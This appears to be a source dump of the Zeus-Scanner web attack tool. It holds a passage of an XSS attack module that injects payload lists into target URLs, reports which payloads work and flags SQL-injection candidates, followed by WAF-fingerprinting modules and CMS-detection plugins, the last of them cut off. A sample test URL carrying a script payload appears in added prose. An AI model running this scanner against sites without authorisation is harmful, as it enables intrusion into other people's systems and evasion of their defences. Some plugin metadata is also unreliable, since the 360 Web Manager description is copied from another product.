85 | payload = __tamper_payload(payload, tamper_type=tamper, warning=True, verbose=verbose)
86 | else:
87 | payload = __tamper_payload(payload, tamper_type=tamper, warning=False, verbose=verbose)
88 | except InvalidTamperProvided:
89 | lib.core.settings.logger.warning(lib.core.settings.set_color(
90 | "you provided an invalid tamper script, acceptable tamper scripts are: {}".format(
91 | " | ".join(list_tamper_scripts())
92 | ), level=40
93 | ))
94 | loaded_url = "{}{}\n".format(assign_protocol(url.strip(), force=force), payload.strip())
95 | tmp.write(loaded_url)
96 | return tf_name
97 |
98 |
99 | def find_xss_script(url, **kwargs):
100 | """
101 | parse the URL for the given XSS payload
102 | """
103 | data = urlparse.urlparse(url)
104 | payload_parser = {"path": 2, "query": 4, "fragment": 5}
105 | if data[payload_parser["fragment"]] != "":
106 | retval = "{}{}".format(
107 | data[payload_parser["query"]], data[payload_parser["fragment"]]
108 | )
109 | else:
110 | retval = data[payload_parser["query"]]
111 |
112 | # just double checking
113 | if retval == "":
114 | retval = data[payload_parser["path"]]
115 | return retval
116 |
117 |
118 | def scan_xss(url, agent=None, proxy=None):
119 | """
120 | scan the payload to see if the XSS is still present in the HTML, if it is there's a very good
121 | chance that the URL is vulnerable to XSS attacks. Usually what will happen is the payload will
122 | be tampered or encoded if the site is not vulnerable
123 | """
124 |
125 | try:
126 | _, status, html_data, _ = lib.core.common.get_page(url, agent=agent, proxy=proxy)
127 | query = find_xss_script(url)
128 | for db in lib.core.settings.DBMS_ERRORS.keys():
129 | for item in lib.core.settings.DBMS_ERRORS[db]:
130 | if re.findall(item, html_data):
131 | return "sqli", db
132 | if status != 404:
133 | if query in html_data:
134 | return True, None
135 | return False, None
136 | except (requests.exceptions.ChunkedEncodingError, requests.exceptions.ConnectionError):
137 | return False, None
138 |
139 |
140 | def main_xss(start_url, proxy=None, agent=None, **kwargs):
141 | """
142 | main attack method to be called
143 | """
144 | tamper = kwargs.get("tamper", None)
145 | verbose = kwargs.get("verbose", False)
146 | batch = kwargs.get("batch", False)
147 | force = kwargs.get("force_ssl", False)
148 |
149 | question_msg = (
150 | "it appears that heuristic tests have shown this URL may not be a good "
151 | "candidate to perform XSS tests on, would you like to continue anyways"
152 | )
153 | if not batch:
154 | question = lib.core.common.prompt(
155 | question_msg, opts="yN"
156 | ) if not lib.core.settings.URL_QUERY_REGEX.match(start_url) else "y"
157 | else:
158 | question = lib.core.common.prompt(
159 | question_msg, opts="yN", default="y"
160 | )
161 |
162 | if not question.lower().startswith("y"):
163 | return
164 |
165 | try:
166 | if tamper:
167 | lib.core.settings.logger.info(lib.core.settings.set_color(
168 | "tampering payloads with '{}'".format(tamper)
169 | ))
170 | find_xss_script(start_url)
171 | lib.core.settings.logger.info(lib.core.settings.set_color(
172 | "loading payloads"
173 | ))
174 | payloads = __load_payloads()
175 | if verbose:
176 | lib.core.settings.logger.debug(lib.core.settings.set_color(
177 | "a total of {} payloads loaded".format(len(payloads)), level=10
178 | ))
179 | lib.core.settings.logger.info(lib.core.settings.set_color(
180 | "payloads will be written to a temporary file and read from there"
181 | ))
182 | filename = create_urls(start_url, payloads, tamper=tamper, verbose=verbose, force=force)
183 | lib.core.settings.logger.info(lib.core.settings.set_color(
184 | "loaded URL's have been saved to '{}'".format(filename), level=25
185 | ))
186 | lib.core.settings.logger.info(lib.core.settings.set_color(
187 | "testing for XSS vulnerabilities on host '{}'".format(start_url)
188 | ))
189 | if proxy is not None:
190 | lib.core.settings.logger.info(lib.core.settings.set_color(
191 | "using proxy '{}'".format(proxy)
192 | ))
193 | success = set()
194 | with open(filename) as urls:
195 | for i, url in enumerate(urls.readlines(), start=1):
196 | url = url.strip()
197 | payload = find_xss_script(url)
198 | try:
199 | result = scan_xss(url, proxy=proxy, agent=agent)
200 | if verbose:
201 | lib.core.settings.logger.info(lib.core.settings.set_color(
202 | "trying payload '{}'".format(payload)
203 | ))
204 | if result[0] != "sqli" and result[0] is True:
205 | success.add(url)
206 | if verbose:
207 | lib.core.settings.logger.debug(lib.core.settings.set_color(
208 | "payload '{}' appears to be usable".format(payload), level=15
209 | ))
210 | elif result[0] == "sqli":
211 | if i <= 1:
212 | lib.core.settings.logger.error(lib.core.settings.set_color(
213 | "loaded URL '{}' threw a DBMS error and appears to be injectable, test for "
214 | "SQL injection, backend DBMS appears to be '{}'".format(
215 | url, result[1]
216 | ), level=40
217 | ))
218 | else:
219 | if verbose:
220 | lib.core.settings.logger.error(lib.core.settings.set_color(
221 | "SQL error discovered", level=40
222 | ))
223 | else:
224 | if verbose:
225 | lib.core.settings.logger.debug(lib.core.settings.set_color(
226 | "host '{}' does not appear to be vulnerable to XSS attacks with payload '{}'".format(
227 | start_url, payload
228 | ), level=10
229 | ))
230 | except (
231 | requests.exceptions.ConnectionError,
232 | requests.exceptions.TooManyRedirects,
233 | requests.exceptions.ReadTimeout,
234 | requests.exceptions.InvalidURL
235 | ):
236 | if payload != "":
237 | lib.core.settings.logger.error(lib.core.settings.set_color(
238 | "payload '{}' caused a connection error, assuming no good and continuing".format(payload), level=40
239 | ))
240 |
241 | if len(success) != 0:
242 | lib.core.settings.logger.info(lib.core.settings.set_color(
243 | "possible XSS scripts to be used:", level=25
244 | ))
245 | lib.core.settings.create_tree(start_url, list(success))
246 | else:
247 | lib.core.settings.logger.error(lib.core.settings.set_color(
248 | "host '{}' does not appear to be vulnerable to XSS attacks".format(start_url), level=40
249 | ))
250 | question_msg = "would you like to keep the created URLs saved for further testing"
251 | if not batch:
252 | save = lib.core.common.prompt(
253 | question_msg, opts="yN"
254 | )
255 | else:
256 | save = lib.core.common.prompt(
257 | question_msg, opts="yN", default="n"
258 | )
259 |
260 | # only delete the temporary URL file if the user chose not to keep it
261 | if save.lower().startswith("n"):
262 | os.remove(filename)
263 | 
264 | except KeyboardInterrupt:
265 | if not lib.core.common.pause():
266 | lib.core.common.shutdown()
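
At its core, `create_urls` reduces each test case to protocol assignment plus payload concatenation. A small sketch with placeholder target and payload:

    from lib.attacks.xss_scan import assign_protocol

    # one tampered test URL, assembled the same way create_urls does it
    url = "example.com/page.php?id=1"        # placeholder target
    payload = "<script>alert(1)</script>"    # placeholder payload
    loaded_url = "{}{}\n".format(assign_protocol(url.strip()), payload.strip())
    # -> "http://example.com/page.php?id=1<script>alert(1)</script>\n"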
--------------------------------------------------------------------------------
/lib/core/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/core/__init__.py
--------------------------------------------------------------------------------
/lib/core/decorators.py:
--------------------------------------------------------------------------------
1 | import signal
2 | from functools import wraps
3 |
4 | import lib.core.errors
5 | import lib.core.settings
6 |
7 |
8 | class TimeOut:
9 |
10 | def __init__(self, seconds=1, error_message='Timeout'):
11 | self.seconds = seconds
12 | self.error_message = error_message
13 |
14 | def handle_timeout(self, signum, frame):
15 | raise lib.core.errors.PortScanTimeOutException(self.error_message)
16 |
17 | def __enter__(self):
18 | signal.signal(signal.SIGALRM, self.handle_timeout)
19 | signal.alarm(self.seconds)
20 |
21 | def __exit__(self, type_, value, traceback):
22 | signal.alarm(0)
23 |
24 |
25 | def cache(func):
26 | """
27 | if we come across the same URL more than once, it will be cached into memory
28 | so that we don't have to test it again
29 | """
30 | __cache = {}
31 |
32 | @wraps(func)
33 | def func_wrapper(*args, **kwargs):
34 | if args in __cache:
35 | return __cache[args]
36 | else:
37 | __to_cache = func(*args, **kwargs)
38 | __cache[args] = __to_cache
39 | return __to_cache
40 |
41 | return func_wrapper
42 |
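
A brief usage sketch for both helpers; the `slow_lookup` function and the five-second budget are illustrative only, and `signal.alarm` only works on Unix in the main thread:

    import time

    import lib.core.decorators

    @lib.core.decorators.cache
    def slow_lookup(host):  # hypothetical expensive check
        time.sleep(2)
        return "result for {}".format(host)

    slow_lookup("example.com")   # ~2s, result stored keyed by the args tuple
    slow_lookup("example.com")   # returned instantly from the cache

    with lib.core.decorators.TimeOut(seconds=5, error_message="scan timed out"):
        slow_lookup("other-host.tld")  # PortScanTimeOutException if this exceeds 5s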
--------------------------------------------------------------------------------
/lib/core/errors.py:
--------------------------------------------------------------------------------
1 | class InvalidProxyType(Exception): pass
2 |
3 |
4 | class ApiConnectionError(Exception): pass
5 |
6 |
7 | class ApplicationNotFound(Exception): pass
8 |
9 |
10 | class SqlmapFailedStart(Exception): pass
11 |
12 |
13 | class SpiderTestFailure(Exception): pass
14 |
15 |
16 | class InvalidInputProvided(Exception): pass
17 |
18 |
19 | class InvalidTamperProvided(Exception): pass
20 |
21 |
22 | class PortScanTimeOutException(Exception): pass
23 |
24 |
25 | class ZeusArgumentException(Exception): pass
--------------------------------------------------------------------------------
/lib/firewall/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ekultek/Zeus-Scanner/21b87563062326cd480669f2922f650173a2a18e/lib/firewall/__init__.py
--------------------------------------------------------------------------------
/lib/firewall/akamai.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "AkamaiGHost Website Protection (Akamai Global Host)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"you.don.t.have.permission.to.access", re.I),
14 | re.compile(r"<.+>access.denied<.+.>", re.I),
15 | )
16 | for detection in detection_schema:
17 | if detection.search(content) is not None:
18 | if re.compile(r"\bakamaighost", re.I).search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
19 | return True
20 | if re.compile(r"\bak.bmsc.", re.I).search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
21 | return True
22 |
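
Every module under lib/firewall exposes the same `detect(content, **kwargs)` contract along with an `__item__` label, which lets a caller sweep all of them generically. A hedged sketch of such a dispatch loop (illustrative only; the project's actual driver may differ):

    import importlib

    def identify_waf(content, headers, status, modules=("akamai", "cloudflare", "sucuri")):
        # walk a sample subset of the detection modules; each returns True on a hit
        for name in modules:
            module = importlib.import_module("lib.firewall.{}".format(name))
            if module.detect(content, headers=headers, status=status):
                return module.__item__
        return None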
--------------------------------------------------------------------------------
/lib/firewall/anquanbao.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Anquanbao Web Application Firewall (Anquanbao)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | headers = kwargs.get("headers", None)
9 | content = str(content)
10 | detection_schema = (re.compile(r"/aqb_cc/error/"), )
11 | if headers is not None:
12 | for detection in detection_schema:
13 | if detection.search(content) is not None:
14 | return True
15 | try:
16 | if re.compile(r"MISS").search(headers.get("X-Powered-By-Anquanbao")) is not None:
17 | return True
18 | except Exception:
19 | pass
20 |
--------------------------------------------------------------------------------
/lib/firewall/armor.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Armor Protection (Armor Defense)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"\barmor\b", re.I),
11 | re.compile(r"blocked.by.website.protection.from.armour", re.I)
12 | )
13 | for detection in detection_schema:
14 | if detection.search(content) is not None:
15 | return True
16 |
--------------------------------------------------------------------------------
/lib/firewall/aws.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Amazon Web Services Web Application Firewall (Amazon)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"[0-9a-zA-Z]{16,25}<.RequestId>", re.I),
14 | re.compile(r"AccessDenied<.Code>", re.I),
15 | re.compile(r"\bAWS", re.I),
16 | re.compile(r"x.amz.id.\d+", re.I),
17 | re.compile(r"x.amz.request.id", re.I),
18 | re.compile(r"amazon.\d+", re.I)
19 | )
20 | for detection in detection_schema:
21 | if detection.search(content) is not None:
22 | return True
23 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
24 | return True
25 | if detection.search(headers.get(HTTP_HEADER.X_POWERED_BY, "")) is not None:
26 | return True
27 |
--------------------------------------------------------------------------------
/lib/firewall/bigip.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "BIG-IP Application Security Manager (F5 Networks)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"\ATS\w{4,}=", re.I), re.compile(r"BIGip|BipServer", re.I),
13 | re.compile(r"\AF5\Z", re.I)
14 | )
15 | for detection in detection_schema:
16 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/cloudflare.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "CloudFlare Web Application Firewall (CloudFlare)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schemas = (
13 | re.compile(r"CloudFlare Ray ID:|var CloudFlare=", re.I),
14 | re.compile(r"cloudflare-nginx", re.I),
15 | re.compile(r"\A__cfduid=", re.I),
16 | re.compile(r"CF_RAY", re.I)
17 | )
18 | for detection in detection_schemas:
19 | if detection.search(content) is not None:
20 | return True
21 | elif detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
22 | return True
23 | elif detection.search(headers.get(HTTP_HEADER.COOKIE, "")) is not None:
24 | return True
25 | elif detection.search(str(headers)) is not None:
26 | return True
27 |
--------------------------------------------------------------------------------
/lib/firewall/cloudfront.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "CloudFront Firewall (Amazon)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | headers = kwargs.get("headers", None)
9 | detection_schema = (
10 | re.compile(r"\d.\d.[a-zA-Z0-9]{32,60}.cloudfront.net", re.I),
11 | re.compile(r"cloudfront", re.I),
12 | re.compile(r"X-Amz-Cf-Id", re.I)
13 | )
14 | for detection in detection_schema:
15 | if detection.search(str(headers)) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/dw.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "DynamicWeb Injection Check (DynamicWeb)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | headers = kwargs.get("headers", None)
9 | status = kwargs.get("status", None)
10 | detection_schema = (
11 | re.compile(r"dw.inj.check", re.I),
12 | )
13 | if status == 403:
14 | for detection in detection_schema:
15 | if detection.search(headers.get("X-403-status-by", "")) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/fortigate.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "FortiWeb Web Application Firewall (Fortinet)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"<.+>powered.by.fortinet<.+.>", re.I),
14 | re.compile(r"<.+>fortigate.ips.sensor<.+.>", re.I),
15 | re.compile(r"fortigate", re.I), re.compile(r".fgd_icon", re.I),
16 | re.compile(r"\AFORTIWAFSID=", re.I)
17 | )
18 | for detection in detection_schema:
19 | if detection.search(content) is not None:
20 | return True
21 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
22 | return True
23 |
--------------------------------------------------------------------------------
/lib/firewall/generic.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 | from lib.core.settings import PROTECTION_CHECK_PAYLOAD
5 |
6 |
7 | __item__ = "Generic (Unknown)"
8 |
9 |
10 | def detect(content, **kwargs):
11 | content = str(content)
12 | headers = kwargs.get("headers", None)
13 | status = kwargs.get("status", None)
14 | if status == 403:
15 | # if the error HTML is a stock Apache error page, don't flag it: Apache
16 | # routinely returns 403 responses on its own, so a plain Apache 403
17 | # is not evidence of a dedicated protection layer.
18 | if re.compile(r"<.+>403 Forbidden<.+.>", re.I).search(content) is not None:
19 | return False
20 | if re.compile(r"apache.\d+", re.I).search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
21 | return False
22 | # make sure that it's not just a `didn't find what you're looking for` page
23 | # this will probably help out a lot with random WAF detection
24 | if status == 200 or "not found" in content.lower():
25 | return False
26 | detection_schema = (
27 | re.compile("blocked", re.I), re.compile("forbidden", re.I),
28 | re.compile("illegal", re.I), re.compile("reported", re.I),
29 | re.compile("ip.logged", re.I), re.compile("access.denied", re.I),
30 | re.compile("ip.address.logged", re.I), re.compile(r"not.acceptable")
31 | )
32 | for detection in detection_schema:
33 | if detection.search(content) is not None:
34 | return True
35 | if PROTECTION_CHECK_PAYLOAD in content:
36 | return True
37 |
--------------------------------------------------------------------------------
/lib/firewall/modsecurity.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "ModSecurity: Open Source Web Application Firewall"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"ModSecurity|NYOB", re.I),
11 | re.compile(r"Mod Security", re.I),
12 | re.compile(r"mod_security", re.I),
13 | re.compile(r"This error was generated by Mod_Security", re.I),
14 | re.compile(r"Web Server at", re.I),
15 | re.compile(r"page you are (accessing|trying)? (to|is)? (access)? (is|to)? (restricted)?", re.I)
16 | )
17 | for detection in detection_schema:
18 | if detection.search(content) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/paloalto.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Palo Alto Firewall (Palo Alto Networks)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schemas = (
10 | re.compile(r"\bhas been blocked in accordance with company policy\b"),
11 | re.compile(r"<.+>Virus.Spyware.Download.Blocked<.+.>")
12 | )
13 | for detection in detection_schemas:
14 | if detection.search(content) is not None:
15 | return True
16 |
17 |
--------------------------------------------------------------------------------
/lib/firewall/pk.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "pkSecurityModule (IDS)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"<.+>pkSecurityModule\W..\WSecurity.Alert<.+.>", re.I),
11 | re.compile(r"<.+http(s)?.//([w]{3})?.kitnetwork.\w+.+>", re.I),
12 | re.compile(r"<.+>A.safety.critical.request.was.discovered.and.blocked.<.+.>", re.I)
13 | )
14 | for detection in detection_schema:
15 | if detection.search(content) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/powerful.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Powerful Firewall (MyBB plugin)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | status = kwargs.get("status", None)
9 | detection_schema = (
10 | re.compile(r"Powerful Firewall", re.I),
11 | re.compile(r"http(s)?...tiny.cc.powerful.firewall", re.I)
12 | )
13 | if status is not None:
14 | if status == 403:
15 | for detection in detection_schema:
16 | if detection.search(content) is not None:
17 | return True
18 |
--------------------------------------------------------------------------------
/lib/firewall/siteguard.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Website Security SiteGuard (Lite)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r">Powered.by.SiteGuard.Lite<", re.I),
11 | re.compile(r"refuse.to.browse", re.I)
12 | )
13 | for detection in detection_schema:
14 | if detection.search(content) is not None:
15 | return True
16 |
--------------------------------------------------------------------------------
/lib/firewall/sonicwall.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "SonicWALL Firewall (Dell)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | content = str(content)
11 | headers = kwargs.get("headers", None)
12 | detection_schema = (
13 | re.compile(r"This.request.is.blocked.by.the.SonicWALL", re.I),
14 | re.compile(r"Dell.SonicWALL", re.I),
15 | re.compile(r"\bDell\b", re.I),
16 | re.compile(r"Web.Site.Blocked.+\bnsa.banner", re.I),
17 | re.compile(r"SonicWALL", re.I),
18 | re.compile(r"<.+>policy.this.site.is.blocked<.+.>", re.I)
19 | )
20 | for detection in detection_schema:
21 | if detection.search(content) is not None:
22 | return True
23 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
24 | return True
25 |
--------------------------------------------------------------------------------
/lib/firewall/squid.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Squid Proxy (IDS)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | content = str(content)
11 | headers = kwargs.get("headers", None)
12 | detection_schema = (
13 | re.compile(r"squid", re.I),
14 | re.compile(r"Access control configuration prevents", re.I),
15 | re.compile(r"X.Squid.Error", re.I),
16 | )
17 | for detection in detection_schema:
18 | if detection.search(content) is not None:
19 | return True
20 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
21 | return True
22 | if detection.search(str(headers)) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/firewall/stringray.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Stingray Application Firewall (Riverbed / Brocade)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | status = kwargs.get("status", None)
12 | status_schema = (403, 500)
13 | detection_schema = (
14 | re.compile(r"\AX-Mapping-", re.I),
15 | )
16 | for detection in detection_schema:
17 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
18 | if status in status_schema:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/sucuri.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 | __item__ = "Sucuri Firewall (Sucuri Cloudproxy)"
6 |
7 |
8 | def detect(content, **kwargs):
9 | content = str(content)
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"Access Denied - Sucuri Website Firewall"),
13 | re.compile(r"Sucuri WebSite Firewall - CloudProxy - Access Denied"),
14 | re.compile(r"Questions\?.+cloudproxy@sucuri\.net")
15 | )
16 | for detection in detection_schema:
17 | if detection.search(content) is not None:
18 | return True
19 | if re.compile(r"X-Sucuri-ID", re.I).search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
20 | return True
21 |
--------------------------------------------------------------------------------
/lib/firewall/urlscan.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "UrlScan (Microsoft)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"rejected.by.url.scan", re.I),
13 | re.compile(r"/rejected.by.url.scan", re.I)
14 | )
15 | for detection in detection_schema:
16 | if detection.search(content) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.LOCATION, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/varnish.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Varnish FireWall (OWASP)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | content = str(content)
11 | headers = kwargs.get("headers", None)
12 | detection_schema = (
13 | re.compile(r"\bXID: \d+", re.I),
14 | re.compile(r"varnish\Z", re.I),
15 | re.compile(r"varnish"), re.I
16 | )
17 | try:
18 | for detection in detection_schema:
19 | if detection.search(content) is not None:
20 | return True
21 | if detection.search(headers.get(HTTP_HEADER.VIA, "")) is not None:
22 | return True
23 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
24 | return True
25 | except Exception:
26 | pass
27 |
--------------------------------------------------------------------------------
/lib/firewall/wallarm.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Wallarm Web Application Firewall (Wallarm)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"nginx-wallarm", re.I),
13 | )
14 | for detection in detection_schema:
15 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/webknight.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "WebKnight Application Firewall (AQTRONIX)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | status = kwargs.get("status", None)
12 | detection_schema = (
13 | re.compile(r"webknight", re.I),
14 | re.compile(r"WebKnight", re.I)
15 | )
16 | if status is not None:
17 | if status == 999:
18 | return True
19 | for detection in detection_schema:
20 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
21 | return True
22 |
--------------------------------------------------------------------------------
/lib/firewall/webseal.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "IBM Security Access Manager (WebSEAL)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"\bWebSEAL\b", re.I), re.compile(r"\bIBM\b", re.I)
11 | )
12 | for detection in list(detection_schema):
13 | if detection.search(content) is not None:
14 | return True
15 |
--------------------------------------------------------------------------------
/lib/firewall/wordfence.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __item__ = "Wordfence (Feedjit)"
5 |
6 |
7 | def detect(content, **kwargs):
8 | content = str(content)
9 | detection_schema = (
10 | re.compile(r"Generated by Wordfence", re.I),
11 | re.compile(r"Your access to this site has been limited", re.I),
12 | re.compile(r"<.+>Wordfence<.+.>", re.I)
13 | )
14 | for detection in detection_schema:
15 | if detection.search(content) is not None:
16 | return True
17 |
--------------------------------------------------------------------------------
/lib/firewall/yundun.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Yundun Web Application Firewall (Yundun)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | detection_schema = (
12 | re.compile(r"YUNDUN", re.I),
13 | )
14 | if headers is not None:
15 | for detection in detection_schema:
16 | if detection.search(headers.get(HTTP_HEADER.X_CACHE, "")) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.SERVER, "")) is not None:
19 | return True
20 |
--------------------------------------------------------------------------------
/lib/firewall/yunsuo.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | from lib.core.common import HTTP_HEADER
4 |
5 |
6 | __item__ = "Yunsuo Web Application Firewall (Yunsuo)"
7 |
8 |
9 | def detect(content, **kwargs):
10 | headers = kwargs.get("headers", None)
11 | content = str(content)
12 | detection_schema = (
13 | re.compile(r"yunsuo.session", re.I),
14 | )
15 | for detection in detection_schema:
16 | if detection.search(content) is not None:
17 | return True
18 | if detection.search(headers.get(HTTP_HEADER.SET_COOKIE, "")) is not None:
19 | return True
20 | 
--------------------------------------------------------------------------------
/lib/plugins/1024.py:
--------------------------------------------------------------------------------
1 | import re
2 | 
3 | 
4 | __product__ = "1024 CMS"
5 | __description__ = (
6 | "1024 is one of a few CMSs leading the way with the "
7 | "implementation of the AJAX technology into all its "
8 | "areas. This includes dynamic administration and user "
9 | "interaction. 1024 offers you the ability to set up your "
10 | "own community forums, download area, news posts, member management and more."
11 | )
12 | 
13 | 
14 | def search(html, **kwargs):
15 | html = str(html)
16 | plugin_detection_schema = (
17 | re.compile(r"powered.by.1024.cms<.+.>", re.I),
18 | re.compile(r"1024.cms", re.I)
19 | )
20 | for plugin in plugin_detection_schema:
21 | if plugin.search(html) is not None:
22 | return True
23 | 
--------------------------------------------------------------------------------
/lib/plugins/360.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "360 Web Manager"
5 | __description__ = (
6 | "1024 is one of a few CMS's leading the way with the "
7 | "implementation of the AJAX technology into all its "
8 | "areas. This includes dynamic adminstration and user "
9 | "interaction. 1024 offers you to ability to set up your "
10 | "own community forums, download area, news posts, member management and more."
11 | )
12 |
13 |
14 | def search(html, **kwargs):
15 | html = str(html)
16 | plugin_detection_schema = (
17 | re.compile(r"powered.by.360.web.manager", re.I),
18 | re.compile(r"360webmanager.software", re.I),
19 | re.compile(r"http(s)?.\S{2}(www.)?360webmanager(.com)?", re.I),
20 | )
21 | for plugin in plugin_detection_schema:
22 | if plugin.search(html) is not None:
23 | return True
24 |
--------------------------------------------------------------------------------
/lib/plugins/3com.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 |
4 | __product__ = "3COM-NBX"
5 | __description__ = (
6 | "3COM NBX phone system. The NBX NetSet utility is a web "
7 | "interface in which you configure and manage the NBX "
8 | "system. NBX systems present the NBX NetSet utility "
9 | "through an embedded web server that is integrated in system software."
10 | )
11 |
12 |
13 | def search(html, **kwargs):
14 | html = str(html)
15 | plugin_detection_schema = (
16 | re.compile(r"nbx.netset", re.I),
17 | re.compile(r"<.+>nbx.netset<.+.>", re.I),
18 | re.compile(r"3com.corporation", re.I),
19 | re.compile(r"nbx.corporation", re.I),
20 | re.compile(r"http(s)?.//(www.)?nbxhelpdesk.com", re.I),
21 | re.compile(r"nbx.help.desk", re.I)
22 | )
23 | for plugin in plugin_detection_schema:
24 | if plugin.search(html) is not None:
